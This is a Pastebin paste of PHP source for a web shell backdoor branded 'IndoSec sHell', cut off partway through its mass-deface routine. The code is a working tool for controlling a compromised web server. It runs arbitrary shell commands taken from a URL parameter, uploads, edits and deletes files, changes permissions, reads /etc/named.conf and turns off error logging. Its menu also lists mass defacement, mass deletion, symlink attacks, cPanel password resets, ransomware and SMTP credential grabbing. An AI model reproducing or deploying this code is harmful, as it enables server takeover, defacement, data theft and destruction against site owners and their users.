Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- * Konsep Shell : Brillyan -Founder { IndoSec }-
- * Pembuat : Holiq - { IndoSec }
- * Re-Code Boleh Asal Dah Izin Sama Pembuat, Ganti Author & Re-Code Tanpa Seizin Pembuat... Fix Lo Noob Anjenk
- * Klo Kga Bisa Bikin Cek Chanel IndoSec, Ada Tutornya, Jangan Cuma Bisa Ganti Author Doank Bangsad
- * Thanks For All Member { IndoSec }, Yang Telah Membantu Proses Pembuatan Shell,Dan Dari Shell Lain Untuk Inspirasinya
- * { IndoSec sHell }
- * Untuk Tools Yang Lain Akan Ditambahkan Di-update Berikutnya..
- * �2019 { IndoSec } -Holiq-
- * Contact Me? fb.com/holiq.xidWhatsApp? Cek Bio Fb
- * Nb: shell ini blm sepenuhnya selesai, jadi kalau menemukan error/tampilan tidak bagus/responsive harap dimaklumi. V 0.1
- */
- session_start();
- error_reporting(0);
- @set_time_limit(0);
- @clearstatcache();
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- /* Configurasi */
- $aupas = "1968a2acf85ae9b8099c2a381c612fed";// IndoSec:v
- $default_action = 'FilesMan';
- $default_use_ajax = true;
- $default_charset = 'UTF-8';
- date_default_timezone_set("Asia/Jakarta");
- function login_shell() {
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/>
- <meta name="theme-color" content="#343a40"/>
- <meta name="author" content="Holiq"/>
- <meta name="copyright" content="{ IndoSec }"/>
- <title>{ IndoSec sHell }</title>
- <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
- <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
- <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/>
- </head>
- <body class="bg-dark text-center text-light">
- <div class="container text-center mt-3">
- <h1>{ CY83R#4CK18 }</h1>
- <h5>sHell Backdoor</h5><hr/>
- <p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Please Login</p>
- <form method="post">
- <div class="form-group input-group">
- <div class="input-group-prepend">
- <div class="input-group-text"><i class="fa fa-user"></i></div>
- </div>
- <input type="password" name="pass" placeholder="User Id..." class="form-control">
- </div>
- <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login">
- </form>
- </div>
- <a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a>
- </body>
- </html>
- <?php
- exit;
- }
- if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){
- if(isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)){
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- }else{
- login_shell();
- }
- }
- /*
- * Akhir Login
- *
- * Aksi Download
- */
- if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['aksi'] == 'download')) {
- @ob_clean();
- $file = $_GET['file'];
- header('Content-Description: File Transfer');
- header('Content-Type: application/octet-stream');
- header('Content-Disposition: attachment; filename="'.basename($file).'"');
- header('Expires: 0');
- header('Cache-Control: must-revalidate');
- header('Pragma: public');
- header('Content-Length: ' . filesize($file));
- readfile($file);
- exit;
- }
- function w($dir,$perm) {
- if(!is_writable($dir)) {
- return "<font color='red'>".$perm."</font>";
- }else{
- return "<font color='lime'>".$perm."</font>";
- }
- }
- function r($dir,$perm) {
- if(!is_readable($dir)) {
- return "<font color=red>".$perm."</font>";
- } else {
- return "<font color=lime>".$perm."</font>";
- }
- }
- function exe($cmd) {
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) {
- $buff .= $result;
- } return $buff;
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- if(isset($_GET['dir'])) {
- $dir = $_GET['dir'];
- chdir($dir);
- } else {
- $dir = getcwd();
- }
- $os = php_uname();
- $ip = getHostByName(getHostName());
- $ver = phpversion();
- $web = $_SERVER['HTTP_HOST'];
- $sof = $_SERVER['SERVER_SOFTWARE'];
- $dir = str_replace("\\","/",$dir);
- $scdir = explode("/", $dir);
- $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
- $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
- $mail = (function_exists('mail')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
- $total = disk_total_space($dir);
- $free = disk_free_space($dir);
- $pers = (int) ($free/$total*100);
- $ds = @ini_get("disable_functions");
- $show_ds = (!empty($ds)) ? "<a href='?dir=$dir&aksi=disabfunc' class='ds'>$ds</a>" : "<a href='?dir=$dir&aksi=disabfunc'><font color=green>NONE</font></a>";
- $imgfol = "<img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img>";
- $imgfile = "<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img>";
- function formatSize( $bytes ) {
- $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
- for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
- return( round( $bytes, 2 )." ".$types[$i] );
- }
- function ambilKata($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- $d0mains = @file("/etc/named.conf", false);
- if (!$d0mains) {
- $die = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
- $GLOBALS["need_to_update_header"] = "true";
- }else{
- $count = 0;
- foreach ($d0mains as $d0main) {
- if (@strstr($d0main, "zone")) {
- preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if (strlen(trim($domains[1][0])) > 2) {
- flush();
- $count++;
- }
- }
- }
- $dom = "$count Domain";
- }
- function swall($swa,$text,$dir){
- echo "<script>Swal.fire({
- title: '$swa',
- text: '$text',
- type: '$swa',
- }).then((value) => {window.location='?dir=$dir';})</script>";
- }
- ?>
- <html>
- <head>
- <meta name="viewport" content="widht=device-widht, initial-scale=1"/>
- <meta name="theme-color" content="#343a40"/>
- <meta name="author" content="Holiq"/>
- <meta name="copyright" content="{ IndoSec }"/>
- <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/>
- <title>{ IndoSec sHell }</title>
- <link rel="stylesheet" href="pojan/assets/css/bootstrap.min.css">
- <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/>
- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.min.css"/>
- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"/>
- <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
- <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
- <script src="https://cdn.jsdelivr.net/npm/sweetalert2@8.18.0/dist/sweetalert2.all.min.js"></script>
- </head>
- <body class="bg-dark text-light">
- <script>
- $(document).ready(function(){
- $(window).scroll(function(){
- if ($(this).scrollTop() > 700) {
- $(".scrollToTop").fadeIn();
- }else{
- $(".scrollToTop").fadeOut();
- }
- });
- $(".scrollToTop").click(function(){
- $("html, body").animate({scrollTop : 0},1000);
- return false;
- });
- });
- $(document).ready(function() {
- $('input[type="file"]').on("change", function() {
- let filenames = [];
- let files = document.getElementById("customFile").files;
- if (files.length > 1) {
- filenames.push("Total Files (" + files.length + ")");
- } else {
- for (let i in files) {
- if (files.hasOwnProperty(i)) {
- filenames.push(files[i].name);
- }
- }
- }
- $(this).next(".custom-file-label").html(filenames.join(","));
- });
- });
- var max_fields = 5;
- var x = 1;
- $(document).on('click', '#add_input', function(e){
- if(x < max_fields){
- x++;
- $('#output').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_file[]\" placeholder=\"Nama File...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
- }
- $('#output').on("click",".remove", function(e){
- e.preventDefault(); $(this).parent('#out').remove(); x--;
- repeat();
- })
- });
- $(document).on('click', '#add_input1', function(e){
- if(x < max_fields){
- x++;
- $('#output1').append('<div class=\"input-group\ form-group\ text-dark\" id=\"out\"><input type=\"text\" class=\"form-control\" name=\"nama_folder[]\" placeholder=\"Nama Folder...\"><div class=\"input-group-prepend\ remove\"><div class=\"input-group-text\"><a href="#" class="text-dark"><i class=\"fa fa-minus\"></i></a></div></div></div>');
- }
- $('#output1').on("click",".remove", function(e){
- e.preventDefault(); $(this).parent('#out').remove(); x--;
- repeat();
- })
- });
- </script>
- <style>
- @import url(https://fonts.googleapis.com/css?family=Lato);
- @import url(https://fonts.googleapis.com/css?family=Quicksand);
- @import url(https://fonts.googleapis.com/css?family=Inconsolata);
- input[type="text"],textarea {font-family: "Inconsolata", monospace;}
- body{margin:0;padding:0;font-family:"Lato";overscroll-behavior:none;}
- .infor{font-size:14px;color:#333!important;}
- .ds{color:#f00!important;word-wrap:break-word;}
- #tab table thead th{padding:5px;font-size:16px;white-space: nowrap;}
- #tab tr {border-bottom:1px solid #ccc;}
- #tab tr:hover{background:#5B6F7D;color:#fff;}
- #tab tr td{padding:5px 10px;white-space:nowrap;}
- .pinggir{text-align:left !important; padding-left: 4px !important;}
- #tab tr td .badge{font-size:13px;}
- .active,.active:hover{color:#00FF00;}
- a {font-family:"Quicksand"; color:white;}
- a:hover{color:dodgerBlue;}
- .badge{width:30px;transition:.3s;}
- .badge:hover{transform: scale(1.1);transition:.3s;}
- .ico {width:25px;}
- .ico2{width:30px;}
- @media(min-width:767px){.scrollToTop{display:none !important;}}
- .scrollToTop{
- position:fixed;
- bottom:30px;
- right:30px;
- width:35px;
- height:35px;
- background:#262626;
- color:#fff;
- border-radius:15%;
- text-align:center;
- opacity:.5;
- }
- .scrollToTop:hover{color:#fff;}
- .up{font-size:25px;line-height:35px;}
- .lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
- .lain:hover{color:#fff;}
- .tambah{
- width:35px;
- height:35px;
- line-height:35px;
- border:1px solid;
- border-radius:50%;
- text-align:center;
- }
- .fiture{margin:3px;}
- .tmp th {font-size:14px;}
- .tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;padding:2px 5px;}
- .tmp tr:hover{background:#5B6F7D; color:#fff;}
- .about{color:#000;}
- .about .card-body .img{
- position: relative;
- background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
- background-size: cover;
- width: 150px;
- height: 150px;
- }
- .butn {
- position: relative;
- text-align: center;
- padding: 3px;
- background:rgba(225,225,225,.3);
- -webkit-transition: background 300ms ease, color 300ms ease;
- transition: background 300ms ease, color 300ms ease;
- }
- input[type="radio"].toggle {display:none;}
- input[type="radio"].toggle + label {cursor:pointer;margin:0 2px;width:60px;}
- input[type="radio"].toggle + label:after {
- position: absolute;
- content: "";
- top: 0;
- background: #fff;
- height: 100%;
- width: 100%;
- z-index: -1;
- -webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
- transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
- }
- input[type="radio"].toggle.toggle-left + label:after {left:100%;}
- input[type="radio"].toggle.toggle-right + label {margin-left:-5px;}
- input[type="radio"].toggle.toggle-right + label:after {left:-100%;}
- input[type="radio"].toggle:checked + label {cursor:default;color:#000;-webkit-transition:color 400ms;transition: color 400ms;}
- input[type="radio"].toggle:checked + label:after {left:0;}
- </style>
- <nav class="navbar static-top navbar-dark">
- <button class="navbar-toggler"type="button" data-toggle="collapse" data-target="#info" aria-label="Toggle navigation">
- <i style="color:#fff;" class="fa fa-navicon"></i>
- </button>
- <div class="collapse navbar-collapse" id="info">
- <ul>
- <a href="https://facebook.com/IndoSecOfficial" class="lain"><i class="fa fa-facebook tambah"></i></a>
- <a href="https://www.instagram.com/indosec.id" class="lain"><i class="fa fa-instagram tambah"></i></a>
- <a href="https://www.youtube.com/IndoSec" class="lain"><i class="fa fa-youtube-play tambah"></i></a>
- <a href="https://github.com/indosecid" class="lain"><i class="fa fa-github tambah"></i></a>
- <a href="https://indosec.web.id" class="lain"><i class="fa fa-globe tambah"></i></a>
- </ul>
- </div>
- </nav>
- <?php
- echo '
- <div class="container">
- <h1 class="text-center"><a href="https://facebook.com/IndoSecOfficial" style="color:#ffffff;">{ INDOSEC }</h1>
- <center><h5>Shell Backdoor</a></h5></center>
- <hr/>
- <div class="text-center">
- <div class="d-flex justify-content-center flex-wrap">
- <a href="?" class="fiture btn btn-danger btn-sm"><i class="fa fa-home"></i> Home</a>
- <a href="?dir='.$dir.'&aksi=upload" class="fiture btn btn-danger btn-sm"><i class="fa fa-upload"></i> Upload</a>
- <a href="?dir='.$dir.'&aksi=buat_file" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus-circle"></i> Buat File</a>
- <a href="?dir='.$dir.'&aksi=buat_folder" class="fiture btn btn-danger btn-sm"><i class="fa fa-plus"></i> Buat Folder</a>
- <a href="?dir='.$dir.'&aksi=masdef" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Mass Deface</a>
- <a href="?dir='.$dir.'&aksi=masdel" class="fiture btn btn-danger btn-sm"><i class="fa fa-trash"></i> Mass Delete</a>
- <a href="?dir='.$dir.'&aksi=jumping" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-triangle"></i> Jumping</a>
- <a href="?dir='.$dir.'&aksi=config" class="fiture btn btn-danger btn-sm"><i class="fa fa-cogs"></i> Config</a>
- <a href="?dir='.$dir.'&aksi=adminer" class="fiture btn btn-danger btn-sm"><i class="fa fa-user"></i> Adminer</a>
- <a href="?dir='.$dir.'&aksi=symlink" class="fiture btn btn-danger btn-sm"><i class="fa fa-exclamation-circle"></i> Symlink</a>
- <a href="?dir='.$dir.'&aksi=bctools" class="fiture btn btn-danger btn-sm"><i class="fas fa-network-wired"></i> Network</a>
- <a href="?dir='.$dir.'&aksi=resetpasscp" class="fiture btn btn-warning btn-sm"><i class="fa fa-key"></i> Auto Reset Cpanel</a>
- <a href="?dir='.$dir.'&aksi=auteduser" class="fiture btn btn-warning btn-sm"><i class="fas fa-user-edit"></i> Auto Edit User</a>
- <a href="?dir='.$dir.'&aksi=ransom" class="fiture btn btn-warning btn-sm"><i class="fab fa-keycdn"></i> Ransomware</a>
- <a href="?dir='.$dir.'&aksi=smtpgrab" class="fiture btn btn-warning btn-sm"><i class="fas fa fa-exclamation-circle"></i> SMTP Grabber</a>
- <a href="?dir='.$dir.'&aksi=bypascf" class="fiture btn btn-warning btn-sm"><i class="fas fa-cloud"></i> Bypass Cloud Flare</a>
- <a href="?dir='.$dir.'&aksi=zip_menu" class="fiture btn btn-warning btn-sm"><i class="fa fa-file-archive-o"></i> Zip Menu</a>
- <a href="?about" class="fiture btn btn-warning btn-sm"><i class="fa fa-info"></i> About Us</a>
- <a href="?keluar" class="fiture btn btn-warning btn-sm"><i class="fa fa-sign-out"></i> keluar</a>
- </div>
- </div>
- <div class="row">
- <div class="col-md-5"><br/>
- <h5><i class="fa fa-terminal"></i>Terminal : </h5>
- <form>
- <input type="text" class="form-control" name="cmd" autocomplete="off" placeholder="id | uname -a | whoami | heked">
- </form>
- <hr/>
- <h5><i class="fa fa-search"></i> Informasi : </h5>
- <div class="card table-responsive">
- <div class="card-body">
- <table class="table infor">
- <tr>
- <td>PHP</td>
- <td> : '.$ver.'</td>
- </tr>
- <tr>
- <td>IP Server</td>
- <td> : '.$ip.'</td>
- </tr>
- <tr>
- <td>HDD</td>
- <td class="d-flex">Total : '.formatSize($total).' Free : '.formatSize($free).' ['.$pers.'%]</td>
- </tr>
- <tr>
- <td>Domain</td>
- <td>: '.$dom.''.$die.'</td>
- </tr>
- <tr>
- <td>MySQL</td>
- <td>: '.$mysql.'</td>
- </tr>
- <tr>
- <td>cURL</td>
- <td>: '.$curl.'</td>
- </tr>
- <tr>
- <td>Mailer</td>
- <td>: '.$mail.'</td>
- </tr>
- <tr>
- <td>Disable Function</td>
- <td>: '.$show_ds.'</td>
- </tr>
- <tr>
- <td>Software</td>
- <td>: '.$sof.'</td>
- </tr>
- <tr>
- <td>Sistem Operasi</td>
- <td> : '.$os.'</td>
- </tr>
- </table>
- </div>
- </div><hr/>
- </div>
- <div class="col-md-7 mt-4">';
- //keluar
- if (isset($_GET['keluar'])) {
- session_start();
- session_destroy();
- echo '<script>window.location="?";</script>';
- }
- //cmd
- if(isset($_GET['cmd'])){
- echo "<pre class='text-white'>".exe($_GET['cmd'])."</pre>";
- exit;
- }
- //about
- if (isset($_GET['about'])) {
- echo '<div class="card text-center bg-light about">
- <h4 class="card-header">{ IndoSec }</h4>
- <div class="card-body">
- <center><div class="img"></div></center>
- <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p>
- </div>
- <div class="card-footer">
- <small class="card-text text-muted">Copyright 2019 { IndoSec }</small>
- </div>
- </div><br/>';
- exit;
- }
- //upload
- if ($_GET['aksi'] == 'upload') {
- echo '<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader">
- <div class="card">
- <div class="card-body form-group">
- <p class="text-muted">//Multiple Upload</p>
- <div class="custom-file">
- <input type="file" name="file[]" multiple class="custom-file-input" id="customFile">
- <label class="custom-file-label" for="customFile">Choose file</label>
- </div>
- <input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload">
- </div>
- </div>
- </form>';
- if(isset($_POST['upload'])){
- $jumlah = count($_FILES['file']['name']);
- for($i=0;$i<$jumlah;$i++){
- $filename = $_FILES['file']['name'][$i];
- $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename);
- }
- if($jumlah < 2) {
- if($up){
- $swa = "success";
- $text = "Berhasil Upload $filename";
- swall($swa,$text,$dir);
- }else{
- $swa = "error";
- $text = "Gagal Upload File";
- swall($swa,$text,$dir);
- }
- }else{
- $swa = "success";
- $text = "Berhasil Upload $jumlah File";
- swall($swa,$text,$dir);
- }
- }
- }
- //openfile
- if (isset($_GET['file'])) {
- $file = $_GET['file'];
- }
- $nfile = basename($file);
- //chmod
- if($_GET['aksi'] == 'chmod_file') {
- echo "<form method='POST'>
- <h5>Chmod File : $nfile </h5>
- <div class='form-group input-group'>
- <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['file'])), -4)."'>
- <input type='submit' class='btn btn-danger form-control' value='Chmod'>
- </div>
- </form>";
- if(isset($_POST['perm'])){
- if(@chmod($_GET['file'],$_POST['perm'])){
- echo '<font color="lime">Change Permission Berhasil</font><br/>';
- }else{
- echo '<font color="white">Change Permission Gagal</font><br/>';
- }
- }
- }
- //buat_file
- if ($_GET['aksi'] == 'buat_file') {
- echo "<h4><img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img> Buat File :</h4>
- <form method='POST'>
- <div class='input-group'>
- <input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'>
- <div class='input-group-prepend'>
- <div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div>
- </div>
- </div><br/>
- <div id='output'></div>
- <textarea name='isi_file' class='form-control' rows='13' placeholder='Isi File...'></textarea><br/>
- <input type='submit' class='btn btn-info btn-block' name='bikin' value='Buat'>
- </form>";
- if (isset($_POST['bikin'])) {
- $name = $_POST['nama_file'];
- $isi_file = $_POST['isi_file'];
- foreach ($name as $nama_file) {
- $handle = @fopen("$nama_file", "w");
- if($isi_file){
- $buat = @fwrite($handle, $isi_file);
- }else{
- $buat = $handle;
- }
- }
- if ($buat) {
- $swa = "success";
- $text = "Berhasil Membuat File";
- swall($swa,$text,$dir);
- }else{
- $swa = "error";
- $text = "Gagal Membuat File";
- swall($swa,$text,$dir);
- }
- }
- }
- /*
- View
- */
- if($_GET['aksi'] == 'view') {
- echo '[ <a class="active" href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]
- <h5>'.$imgfile.' Lihat File : '.$nfile.'</h5>
- <textarea rows="13" class="form-control" disabled="">'.htmlspecialchars(@file_get_contents($file)).'</textarea><br/>';
- }
- /*
- Edit
- */
- if($_GET['aksi'] == 'edit') {
- echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
- echo "<form method='POST'>
- <h5>$imgfile Edit File : $nfile</h5>
- <textarea rows='13' class='form-control' name='isi'>".htmlspecialchars(@file_get_contents($file))."</textarea><br/>
- <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>
- </form>";
- if(isset($_POST['edit_file'])) {
- $updt = fopen("$file", "w");
- $hasil = fwrite($updt, $_POST['isi']);
- if ($hasil) {
- $swa = "success";
- $text = "Berhasil Update File";
- swall($swa,$text,$dir);
- }else{
- $swa = "error";
- $text = "Gagal Update File";
- swall($swa,$text,$dir);
- }
- }
- }
- /*
- Rename
- */
- if($_GET['aksi'] == 'rename') {
- echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
- echo "<form method='POST'>
- <h5>$imgfile Rename File : $nfile</h5>
- <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nfile'><br/>
- <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Rename</button>
- </form>";
- if(isset($_POST['rename_file'])) {
- $lama = $file;
- $baru = $_POST['namanew'];
- rename( $baru, $lama);
- if(file_exists($baru)) {
- $swa = "success";
- $text = "Nama $baru Telah Digunakan";
- swall($swa,$text,$dir);
- }else{
- if(rename( $lama, $baru)) {
- $swa = "success";
- $text = "Berhasil Mengganti Nama Menjadi $baru";
- swall($swa,$text,$dir);
- }else{
- $swa = "error";
- $text = "Gagal Mengganti Nama";
- swall($swa,$text,$dir);
- }
- }
- }
- }
- /*
- Delete File
- */
- if ($_GET['aksi'] == 'hapusf') {
- echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
- echo "
- <div class='card card-body text-center text-dark mb-4'>
- <p>Yakin Menghapus : $nfile</p>
- <form method='POST'>
- <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
- <input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'>
- </form>
- </div>";
- if ($_POST['ya']) {
- if (unlink($file)) {
- $swa = "success";
- $text = "Berhasil Menghapus File";
- swall($swa,$text,$dir);
- }else{
- $swa = "error";
- $text = "Gagal Menghapus File";
- swall($swa,$text,$dir);
- }
- }
- }
- $ndir = basename($dir);
- //chmod
- if($_GET['aksi'] == 'chmod_dir') {
- $ndir = basename($dir);
- echo "<form method='POST'>
- <h5>Chmod Folder : $ndir </h5>
- <div class='form-group input-group'>
- <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['dir'])), -4)."'>
- <input type='submit' class='btn btn-danger form-control' value='Chmod' name='chmo'>
- </div>
- </form>";
- if(isset($_POST['chmo'])){
- if(@chmod($_GET['dir'],$_POST['perm'])){
- echo '<font color="lime">Change Permission Berhasil</font><br/>';
- }else{
- echo '<font color="white">Change Permission Gagal</font><br/>';
- }
- }
- }
- /*
- Add Folder
- */
- if ($_GET['aksi'] == 'buat_folder' ) {
- echo "
- <h4>$imgfol Buat Folder :</h4>
- <form method='POST'>
- <div class='input-group'>
- <input type='text' class='form-control' name='nama_folder[]' placeholder='Nama Folder...'>
- <div class='input-group-prepend'>
- <div class='input-group-text'><a id='add_input1'><i class='fa fa-plus'></i></a></div>
- </div>
- </div><br/>
- <div id='output1'></div>
- <input type='submit' class='btn btn-info btn-block' name='buat' value='Buat'>
- </form>";
- if (isset($_POST['buat'])) {
- $nama = $_POST['nama_folder'];
- foreach ($nama as $nama_folder) {
- $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder);
- $fd = @mkdir ($folder);
- }
- if ($fd) {
- $swa = "success";
- $text = "Berhasil Membuat Folder";
- swall($swa,$text,$dir);
- }else{
- $swa = "error";
- $text = "Gagal Membuat Folder";
- swall($swa,$text,$dir);
- }
- }
- }
- /*
- Rename Folder
- */
- if ($_GET['aksi'] == 'rename_folder' ) {
- echo "
- [ <a href='?dir=".$dir."&aksi=rename_folder' class='active'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]
- <h4>$imgfol Rename Folder : $ndir </h4>
- <form method='POST'>
- <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nama'><br/>
- <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
- </form>";
- if(isset($_POST['ganti'])) {
- $baru = htmlspecialchars($_POST['namanew']);
- $ubah = rename($dir, "".dirname($dir)."/".$baru."");
- if($ubah) {
- $swa = "success";
- $text = "Berhasil Mengganti Nama";
- $dir = dirname($dir);
- swall($swa,$text,$dir);
- }else{
- $swa = "error";
- $text = "Gagal Mengganti Nama";
- $dir = dirname($dir);
- swall($swa,$text,$dir);
- }
- }
- exit;
- }
- /*
- Delete Folder
- */
- if ($_GET['aksi'] == 'hapus_folder' ) {
- echo "
- [ <a href='?dir=".$dir."&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder' class='active'>Delete</a> ]
- <div class='card card-body text-center text-dark mb-4'>
- <p>Apakah Yakin Menghapus : $ndir ?</p>
- <form method='POST'>
- <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
- <input type='submit' name='ya' class='btn btn-success btn-block' value='Ya'>
- </form>
- </div><br/>";
- if ($_POST['ya']) {
- if(is_dir($dir)) {
- if(is_writable($dir)) {
- @rmdir($dir);
- @exe("rm -rf $dir");
- @exe("rmdir /s /q $dir");
- $swa = "success";
- $text = "Berhasil Menghapus";
- $dir = dirname($dir);
- swall($swa,$text,$dir);
- } else {
- $swa = "error";
- $text = "Berhasil Menghapus";
- $dir = dirname($dir);
- swall($swa,$text,$dir);
- }
- }
- }
- exit;
- }
- /*
- * Fungsi_Tambahan
- *
- *
- * Mass Deface
- * IndoXploit
- */
- if($_GET['aksi'] == 'masdef') {
- function tipe_massal($dir,$namafile,$isi_script) {
- if(is_writable($dir)) {
- $dira = scandir($dir);
- foreach($dira as $dirb) {
- $dirc = "$dir/$dirb";
- $lokasi = $dirc.'/'.$namafile;
- if($dirb === '.') {
- file_put_contents($lokasi, $isi_script);
- } elseif($dirb === '..') {
